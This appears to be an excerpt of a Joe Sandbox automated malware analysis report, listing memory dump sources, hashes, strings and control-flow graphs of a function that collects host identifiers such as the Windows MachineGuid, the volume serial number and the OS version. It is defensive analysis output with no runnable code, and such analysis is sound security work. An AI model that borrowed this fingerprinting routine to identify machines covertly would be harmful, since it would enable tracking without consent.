                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: 6fc8e5aef3c0adedc2f43b3f166f384598c9bf3ae0fb0c236191496213b27637
                                                                                                                  • Instruction ID: 8cac0dbbb7d9ca5e7a9ed5737f94ef1452d014a226dd7347c61f2d2c1149b926
                                                                                                                  • Opcode Fuzzy Hash: 6fc8e5aef3c0adedc2f43b3f166f384598c9bf3ae0fb0c236191496213b27637
                                                                                                                  • Instruction Fuzzy Hash: FDD13A61F0CE5381FA208B1BE5843BD2290AB42FB6F1961F3D95E476B0DE2DF8648341

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 701 7ffe1a526e0c-7ffe1a526e26 call 7ffe1a527734 704 7ffe1a527348 701->704 705 7ffe1a526e2c-7ffe1a526e41 call 7ffe1a5276b3 701->705 707 7ffe1a52735c-7ffe1a527361 704->707 710 7ffe1a526e43-7ffe1a526e71 705->710 711 7ffe1a526e97 705->711 709 7ffe1a526ea9-7ffe1a526ec0 call 7ffe1a5277a2 707->709 715 7ffe1a526ec5-7ffe1a526ed2 709->715 719 7ffe1a526e73-7ffe1a526e78 710->719 720 7ffe1a526e7a-7ffe1a526e95 call 7ffe1a5277a2 710->720 712 7ffe1a526e9c-7ffe1a526ea7 FreeLibrary 711->712 712->709 714 7ffe1a526ed3-7ffe1a526f0c GetNativeSystemInfo GetWindowsDirectoryA 712->714 717 7ffe1a526ff0-7ffe1a527013 call 7ffe1a5277a2 714->717 718 7ffe1a526f12-7ffe1a526f33 GetLastError call 7ffe1a5277a2 714->718 717->709 727 7ffe1a527019-7ffe1a52704f call 7ffe1a52d3f2 717->727 728 7ffe1a526f53-7ffe1a526f59 718->728 729 7ffe1a526f35 718->729 719->712 720->712 737 7ffe1a527100-7ffe1a52711c call 7ffe1a5277a2 727->737 738 7ffe1a527055-7ffe1a527057 727->738 728->707 731 7ffe1a526f5f-7ffe1a526f65 728->731 732 7ffe1a526f37-7ffe1a526f44 729->732 733 7ffe1a526f49-7ffe1a526f4e 729->733 735 7ffe1a526f9e-7ffe1a526fa4 731->735 736 7ffe1a526f67-7ffe1a526f6a 731->736 732->733 733->709 741 7ffe1a527384-7ffe1a527389 735->741 742 7ffe1a526faa-7ffe1a526fb0 735->742 739 7ffe1a526f88-7ffe1a526f8e 736->739 740 7ffe1a526f6c-7ffe1a526f6f 736->740 757 7ffe1a527121 737->757 738->709 743 7ffe1a52705d-7ffe1a5270ba GetVolumeInformationA 738->743 746 7ffe1a526f94-7ffe1a526f99 739->746 747 7ffe1a52737a-7ffe1a52737f 739->747 744 7ffe1a526f75-7ffe1a526f78 740->744 745 7ffe1a527366-7ffe1a52736b 740->745 741->709 748 7ffe1a52738e-7ffe1a527393 742->748 749 7ffe1a526fb6-7ffe1a526fbc 742->749 751 7ffe1a5270c0-7ffe1a5270e6 GetLastError call 7ffe1a5277a2 743->751 752 7ffe1a5271b7-7ffe1a5271e9 call 7ffe1a5277a2 743->752 753 7ffe1a526f7e-7ffe1a526f83 744->753 754 7ffe1a527370-7ffe1a527375 744->754 745->709 746->709 747->709 748->709 755 7ffe1a526fbe-7ffe1a526fc3 749->755 756 7ffe1a526fc8-7ffe1a526fcd 749->756 762 7ffe1a527126-7ffe1a52712c 751->762 763 7ffe1a5270e8 751->763 764 7ffe1a5271eb-7ffe1a5271f7 strlen 752->764 765 7ffe1a5271fd-7ffe1a527204 752->765 753->709 754->709 755->709 756->709 757->738 769 7ffe1a527283-7ffe1a527288 762->769 770 7ffe1a527132 762->770 766 7ffe1a52726f-7ffe1a527274 763->766 767 7ffe1a5270ee-7ffe1a5270fb 763->767 764->765 768 7ffe1a5272c9-7ffe1a5272cd 764->768 771 7ffe1a527208-7ffe1a527265 call 7ffe1a5277a2 765->771 766->709 767->737 768->765 775 7ffe1a5272d3-7ffe1a5272d7 768->775 769->709 772 7ffe1a527134-7ffe1a527137 770->772 773 7ffe1a52716b-7ffe1a527171 770->773 778 7ffe1a52726a 771->778 776 7ffe1a527155-7ffe1a52715b 772->776 777 7ffe1a527139-7ffe1a52713c 772->777 779 7ffe1a527177-7ffe1a52717d 773->779 780 7ffe1a5272ab-7ffe1a5272b0 773->780 775->765 781 7ffe1a5272dd-7ffe1a527310 _errno call 7ffe1a5325d0 _errno 775->781 784 7ffe1a5272a1-7ffe1a5272a6 776->784 785 7ffe1a527161-7ffe1a527166 776->785 782 7ffe1a527142-7ffe1a527145 777->782 783 7ffe1a52728d-7ffe1a527292 777->783 778->715 786 7ffe1a527183-7ffe1a527189 779->786 787 7ffe1a5272b5-7ffe1a5272ba 779->787 780->709 794 7ffe1a527320-7ffe1a527343 _errno call 7ffe1a5277a2 781->794 795 7ffe1a527312-7ffe1a527315 781->795 789 7ffe1a527297-7ffe1a52729c 782->789 790 7ffe1a52714b-7ffe1a527150 782->790 783->709 784->709 785->709 791 7ffe1a5272bf-7ffe1a5272c4 786->791 792 7ffe1a52718f-7ffe1a527194 786->792 787->709 789->709 790->709 791->709 792->709 794->765 795->771 796 7ffe1a52731b 795->796 796->765
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: 2ef9b5f18b18199533d016a030eb303b2a9090cb8709f737a6286bf02976b20c
                                                                                                                  • Instruction ID: 4f339d2b67817db1ef3c2e642c11d81d5011f0ef0e8ebbee23fd3e3569ff0091
                                                                                                                  • Opcode Fuzzy Hash: 2ef9b5f18b18199533d016a030eb303b2a9090cb8709f737a6286bf02976b20c
                                                                                                                  • Instruction Fuzzy Hash: 0CD11722F1CE52C1FB609797E4403B926A2AF92F74F1540F7E94E17AB4EF2DA8448351

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 309 7ffe1150210c-7ffe11502126 call 7ffe11502a34 312 7ffe1150212c-7ffe11502141 call 7ffe115029b3 309->312 313 7ffe11502648 309->313 318 7ffe11502197 312->318 319 7ffe11502143-7ffe11502171 312->319 315 7ffe1150265c-7ffe11502661 313->315 317 7ffe115021a9-7ffe115021c0 call 7ffe115040d2 315->317 323 7ffe115021c5-7ffe115021d2 317->323 320 7ffe1150219c-7ffe115021a7 FreeLibrary 318->320 327 7ffe1150217a-7ffe11502195 call 7ffe115040d2 319->327 328 7ffe11502173-7ffe11502178 319->328 320->317 322 7ffe115021d3-7ffe1150220c GetNativeSystemInfo GetWindowsDirectoryA 320->322 325 7ffe11502212-7ffe11502233 GetLastError call 7ffe115040d2 322->325 326 7ffe115022f0-7ffe11502313 call 7ffe115040d2 322->326 335 7ffe11502235 325->335 336 7ffe11502253-7ffe11502259 325->336 326->317 337 7ffe11502319-7ffe1150234f call 7ffe11503402 326->337 327->320 328->320 338 7ffe11502249-7ffe1150224e 335->338 339 7ffe11502237-7ffe11502244 335->339 336->315 340 7ffe1150225f-7ffe11502265 336->340 349 7ffe11502355-7ffe11502357 337->349 350 7ffe11502400-7ffe1150241c call 7ffe115040d2 337->350 338->317 339->338 342 7ffe11502267-7ffe1150226a 340->342 343 7ffe1150229e-7ffe115022a4 340->343 347 7ffe1150226c-7ffe1150226f 342->347 348 7ffe11502288-7ffe1150228e 342->348 345 7ffe115022aa-7ffe115022b0 343->345 346 7ffe11502684-7ffe11502689 343->346 356 7ffe115022b6-7ffe115022bc 345->356 357 7ffe1150268e-7ffe11502693 345->357 346->317 351 7ffe11502666-7ffe1150266b 347->351 352 7ffe11502275-7ffe11502278 347->352 354 7ffe1150267a-7ffe1150267f 348->354 355 7ffe11502294-7ffe11502299 348->355 349->317 353 7ffe1150235d-7ffe115023ba GetVolumeInformationA 349->353 365 7ffe11502421 350->365 351->317 359 7ffe11502670-7ffe11502675 352->359 360 7ffe1150227e-7ffe11502283 352->360 361 7ffe115024b7-7ffe115024e9 call 7ffe115040d2 353->361 362 7ffe115023c0-7ffe115023e6 GetLastError call 7ffe115040d2 353->362 354->317 355->317 363 7ffe115022c8-7ffe115022cd 356->363 364 7ffe115022be-7ffe115022c3 356->364 357->317 359->317 360->317 372 7ffe115024fd-7ffe11502504 361->372 373 7ffe115024eb-7ffe115024f7 strlen 361->373 370 7ffe115023e8 362->370 371 7ffe11502426-7ffe1150242c 362->371 363->317 364->317 365->349 374 7ffe1150256f-7ffe11502574 370->374 375 7ffe115023ee-7ffe115023fb 370->375 377 7ffe11502583-7ffe11502588 371->377 378 7ffe11502432 371->378 379 7ffe11502508-7ffe11502565 call 7ffe115040d2 372->379 373->372 376 7ffe115025c9-7ffe115025cd 373->376 374->317 375->350 376->372 380 7ffe115025d3-7ffe115025d7 376->380 377->317 381 7ffe1150246b-7ffe11502471 378->381 382 7ffe11502434-7ffe11502437 378->382 389 7ffe1150256a 379->389 380->372 386 7ffe115025dd-7ffe11502610 _errno call 7ffe115129b8 _errno 380->386 384 7ffe115025ab-7ffe115025b0 381->384 385 7ffe11502477-7ffe1150247d 381->385 387 7ffe11502439-7ffe1150243c 382->387 388 7ffe11502455-7ffe1150245b 382->388 384->317 392 7ffe115025b5-7ffe115025ba 385->392 393 7ffe11502483-7ffe11502489 385->393 402 7ffe11502612-7ffe11502615 386->402 403 7ffe11502620-7ffe11502643 _errno call 7ffe115040d2 386->403 395 7ffe1150258d-7ffe11502592 387->395 396 7ffe11502442-7ffe11502445 387->396 390 7ffe115025a1-7ffe115025a6 388->390 391 7ffe11502461-7ffe11502466 388->391 389->323 390->317 391->317 392->317 397 7ffe115025bf-7ffe115025c4 393->397 398 7ffe1150248f-7ffe11502494 393->398 395->317 400 7ffe1150244b-7ffe11502450 396->400 401 7ffe11502597-7ffe1150259c 396->401 397->317 398->317 400->317 401->317 402->379 404 7ffe1150261b 402->404 403->372 404->372
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: ab4e7dae9261fa064c85ad98148a0635a1087c5140ac61d5b376cedad794d68b
                                                                                                                  • Instruction ID: cc6af2172127867351dc8b17cc8de20e2af9acb56f8a63d614f3fee1591dcf1a
                                                                                                                  • Opcode Fuzzy Hash: ab4e7dae9261fa064c85ad98148a0635a1087c5140ac61d5b376cedad794d68b
                                                                                                                  • Instruction Fuzzy Hash: FED1AB26E0CE5381FB219B97E8403BC26A9AF457F4F5541FACA4E176B0DF2DE8858341

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 505 7ffe11ec44cc-7ffe11ec44e6 call 7ffe11ec4df4 508 7ffe11ec4a08 505->508 509 7ffe11ec44ec-7ffe11ec4501 call 7ffe11ec4d73 505->509 512 7ffe11ec4a1c-7ffe11ec4a21 508->512 513 7ffe11ec4557 509->513 514 7ffe11ec4503-7ffe11ec4531 509->514 515 7ffe11ec4569-7ffe11ec4580 call 7ffe11ec9dc2 512->515 516 7ffe11ec455c-7ffe11ec4567 FreeLibrary 513->516 523 7ffe11ec453a-7ffe11ec4555 call 7ffe11ec9dc2 514->523 524 7ffe11ec4533-7ffe11ec4538 514->524 520 7ffe11ec4585-7ffe11ec4592 515->520 516->515 519 7ffe11ec4593-7ffe11ec45cc GetNativeSystemInfo GetWindowsDirectoryA 516->519 521 7ffe11ec46b0-7ffe11ec46d3 call 7ffe11ec9dc2 519->521 522 7ffe11ec45d2-7ffe11ec45f3 GetLastError call 7ffe11ec9dc2 519->522 521->515 533 7ffe11ec46d9-7ffe11ec470f call 7ffe11ec3382 521->533 531 7ffe11ec45f5 522->531 532 7ffe11ec4613-7ffe11ec4619 522->532 523->516 524->516 534 7ffe11ec4609-7ffe11ec460e 531->534 535 7ffe11ec45f7-7ffe11ec4604 531->535 532->512 536 7ffe11ec461f-7ffe11ec4625 532->536 545 7ffe11ec47c0-7ffe11ec47dc call 7ffe11ec9dc2 533->545 546 7ffe11ec4715-7ffe11ec4717 533->546 534->515 535->534 538 7ffe11ec4627-7ffe11ec462a 536->538 539 7ffe11ec465e-7ffe11ec4664 536->539 543 7ffe11ec4648-7ffe11ec464e 538->543 544 7ffe11ec462c-7ffe11ec462f 538->544 541 7ffe11ec466a-7ffe11ec4670 539->541 542 7ffe11ec4a44-7ffe11ec4a49 539->542 547 7ffe11ec4676-7ffe11ec467c 541->547 548 7ffe11ec4a4e-7ffe11ec4a53 541->548 542->515 553 7ffe11ec4a3a-7ffe11ec4a3f 543->553 554 7ffe11ec4654-7ffe11ec4659 543->554 550 7ffe11ec4a26-7ffe11ec4a2b 544->550 551 7ffe11ec4635-7ffe11ec4638 544->551 557 7ffe11ec47e1 545->557 546->515 552 7ffe11ec471d-7ffe11ec477a GetVolumeInformationA 546->552 555 7ffe11ec4688-7ffe11ec468d 547->555 556 7ffe11ec467e-7ffe11ec4683 547->556 548->515 550->515 558 7ffe11ec4a30-7ffe11ec4a35 551->558 559 7ffe11ec463e-7ffe11ec4643 551->559 560 7ffe11ec4877-7ffe11ec48a9 call 7ffe11ec9dc2 552->560 561 7ffe11ec4780-7ffe11ec47a6 GetLastError call 7ffe11ec9dc2 552->561 553->515 554->515 555->515 556->515 557->546 558->515 559->515 566 7ffe11ec48bd-7ffe11ec48c4 560->566 567 7ffe11ec48ab-7ffe11ec48b7 strlen 560->567 568 7ffe11ec47a8 561->568 569 7ffe11ec47e6-7ffe11ec47ec 561->569 573 7ffe11ec48c8-7ffe11ec4925 call 7ffe11ec9dc2 566->573 567->566 572 7ffe11ec4989-7ffe11ec498d 567->572 570 7ffe11ec492f-7ffe11ec4934 568->570 571 7ffe11ec47ae-7ffe11ec47bb 568->571 574 7ffe11ec4943-7ffe11ec4948 569->574 575 7ffe11ec47f2 569->575 570->515 571->545 572->566 576 7ffe11ec4993-7ffe11ec4997 572->576 581 7ffe11ec492a 573->581 574->515 578 7ffe11ec482b-7ffe11ec4831 575->578 579 7ffe11ec47f4-7ffe11ec47f7 575->579 576->566 580 7ffe11ec499d-7ffe11ec49d0 _errno call 7ffe11ed1098 _errno 576->580 584 7ffe11ec4837-7ffe11ec483d 578->584 585 7ffe11ec496b-7ffe11ec4970 578->585 582 7ffe11ec47f9-7ffe11ec47fc 579->582 583 7ffe11ec4815-7ffe11ec481b 579->583 598 7ffe11ec49e0-7ffe11ec4a03 _errno call 7ffe11ec9dc2 580->598 599 7ffe11ec49d2-7ffe11ec49d5 580->599 581->520 587 7ffe11ec494d-7ffe11ec4952 582->587 588 7ffe11ec4802-7ffe11ec4805 582->588 589 7ffe11ec4961-7ffe11ec4966 583->589 590 7ffe11ec4821-7ffe11ec4826 583->590 591 7ffe11ec4975-7ffe11ec497a 584->591 592 7ffe11ec4843-7ffe11ec4849 584->592 585->515 587->515 596 7ffe11ec4957-7ffe11ec495c 588->596 597 7ffe11ec480b-7ffe11ec4810 588->597 589->515 590->515 591->515 593 7ffe11ec497f-7ffe11ec4984 592->593 594 7ffe11ec484f-7ffe11ec4854 592->594 593->515 594->515 596->515 597->515 598->566 599->573 600 7ffe11ec49db 599->600 600->566
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                                                                  • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                                                                  • API String ID: 3828489143-883582248
                                                                                                                  • Opcode ID: 99febd57b35f821ac2f0ce874996274aa8bac9404407d019d9cddeeda8cdaf70
                                                                                                                  • Instruction ID: 2d72e02f2b95b269e88c0880ade6121efeac84632f18835bd02c6bf6f6fb7dfb
                                                                                                                  • Opcode Fuzzy Hash: 99febd57b35f821ac2f0ce874996274aa8bac9404407d019d9cddeeda8cdaf70
                                                                                                                  • Instruction Fuzzy Hash: A3D17E61E0CE5381FB2097D7EC403BB62A8AB51774F9551B6D94E17BB4EE2CF8448341

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 937 7ff7c1ab28fc-7ff7c1ab2916 call 7ff7c1ab2304 940 7ff7c1ab2e38 937->940 941 7ff7c1ab291c-7ff7c1ab2931 call 7ff7c1ab2283 937->941 944 7ff7c1ab2e4c-7ff7c1ab2e51 940->944 946 7ff7c1ab2933-7ff7c1ab2961 941->946 947 7ff7c1ab2987 941->947 945 7ff7c1ab2999-7ff7c1ab29b0 call 7ff7c1ab2ef2 944->945 950 7ff7c1ab29b5-7ff7c1ab29c2 945->950 955 7ff7c1ab2963-7ff7c1ab2968 946->955 956 7ff7c1ab296a-7ff7c1ab2985 call 7ff7c1ab2ef2 946->956 948 7ff7c1ab298c-7ff7c1ab2997 FreeLibrary 947->948 948->945 952 7ff7c1ab29c3-7ff7c1ab29fc GetNativeSystemInfo GetWindowsDirectoryA 948->952 953 7ff7c1ab2a02-7ff7c1ab2a23 GetLastError call 7ff7c1ab2ef2 952->953 954 7ff7c1ab2ae0-7ff7c1ab2b03 call 7ff7c1ab2ef2 952->954 963 7ff7c1ab2a25 953->963 964 7ff7c1ab2a43-7ff7c1ab2a49 953->964 954->945 965 7ff7c1ab2b09-7ff7c1ab2b3f call 7ff7c1ab9242 954->965 955->948 956->948 966 7ff7c1ab2a39-7ff7c1ab2a3e 963->966 967 7ff7c1ab2a27-7ff7c1ab2a34 963->967 964->944 968 7ff7c1ab2a4f-7ff7c1ab2a55 964->968 977 7ff7c1ab2bf0-7ff7c1ab2c0c call 7ff7c1ab2ef2 965->977 978 7ff7c1ab2b45-7ff7c1ab2b47 965->978 966->945 967->966 970 7ff7c1ab2a57-7ff7c1ab2a5a 968->970 971 7ff7c1ab2a8e-7ff7c1ab2a94 968->971 975 7ff7c1ab2a78-7ff7c1ab2a7e 970->975 976 7ff7c1ab2a5c-7ff7c1ab2a5f 970->976 973 7ff7c1ab2e74-7ff7c1ab2e79 971->973 974 7ff7c1ab2a9a-7ff7c1ab2aa0 971->974 973->945 981 7ff7c1ab2aa6-7ff7c1ab2aac 974->981 982 7ff7c1ab2e7e-7ff7c1ab2e83 974->982 979 7ff7c1ab2a84-7ff7c1ab2a89 975->979 980 7ff7c1ab2e6a-7ff7c1ab2e6f 975->980 984 7ff7c1ab2a65-7ff7c1ab2a68 976->984 985 7ff7c1ab2e56-7ff7c1ab2e5b 976->985 989 7ff7c1ab2c11 977->989 978->945 986 7ff7c1ab2b4d-7ff7c1ab2baa GetVolumeInformationA 978->986 979->945 980->945 987 7ff7c1ab2ab8-7ff7c1ab2abd 981->987 988 7ff7c1ab2aae-7ff7c1ab2ab3 981->988 982->945 990 7ff7c1ab2e60-7ff7c1ab2e65 984->990 991 7ff7c1ab2a6e-7ff7c1ab2a73 984->991 985->945 992 7ff7c1ab2bb0-7ff7c1ab2bd6 GetLastError call 7ff7c1ab2ef2 986->992 993 7ff7c1ab2ca7-7ff7c1ab2cd9 call 7ff7c1ab2ef2 986->993 987->945 988->945 989->978 990->945 991->945 998 7ff7c1ab2c16-7ff7c1ab2c1c 992->998 999 7ff7c1ab2bd8 992->999 1000 7ff7c1ab2ced-7ff7c1ab2cf4 993->1000 1001 7ff7c1ab2cdb-7ff7c1ab2ce7 strlen 993->1001 1005 7ff7c1ab2c22 998->1005 1006 7ff7c1ab2d73-7ff7c1ab2d78 998->1006 1002 7ff7c1ab2d5f-7ff7c1ab2d64 999->1002 1003 7ff7c1ab2bde-7ff7c1ab2beb 999->1003 1007 7ff7c1ab2cf8-7ff7c1ab2d55 call 7ff7c1ab2ef2 1000->1007 1001->1000 1004 7ff7c1ab2db9-7ff7c1ab2dbd 1001->1004 1002->945 1003->977 1004->1000 1008 7ff7c1ab2dc3-7ff7c1ab2dc7 1004->1008 1009 7ff7c1ab2c24-7ff7c1ab2c27 1005->1009 1010 7ff7c1ab2c5b-7ff7c1ab2c61 1005->1010 1006->945 1017 7ff7c1ab2d5a 1007->1017 1008->1000 1014 7ff7c1ab2dcd-7ff7c1ab2e00 _errno call 7ff7c1abe4b0 _errno 1008->1014 1015 7ff7c1ab2c45-7ff7c1ab2c4b 1009->1015 1016 7ff7c1ab2c29-7ff7c1ab2c2c 1009->1016 1012 7ff7c1ab2c67-7ff7c1ab2c6d 1010->1012 1013 7ff7c1ab2d9b-7ff7c1ab2da0 1010->1013 1018 7ff7c1ab2da5-7ff7c1ab2daa 1012->1018 1019 7ff7c1ab2c73-7ff7c1ab2c79 1012->1019 1013->945 1030 7ff7c1ab2e02-7ff7c1ab2e05 1014->1030 1031 7ff7c1ab2e10-7ff7c1ab2e33 _errno call 7ff7c1ab2ef2 1014->1031 1023 7ff7c1ab2d91-7ff7c1ab2d96 1015->1023 1024 7ff7c1ab2c51-7ff7c1ab2c56 1015->1024 1021 7ff7c1ab2c32-7ff7c1ab2c35 1016->1021 1022 7ff7c1ab2d7d-7ff7c1ab2d82 1016->1022 1017->950 1018->945 1025 7ff7c1ab2daf-7ff7c1ab2db4 1019->1025 1026 7ff7c1ab2c7f-7ff7c1ab2c84 1019->1026 1028 7ff7c1ab2d87-7ff7c1ab2d8c 1021->1028 1029 7ff7c1ab2c3b-7ff7c1ab2c40 1021->1029 1022->945 1023->945 1024->945 1025->945 1026->945 1028->945 1029->945 1030->1007 1032 7ff7c1ab2e0b 1030->1032 1031->1000 1032->1000
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
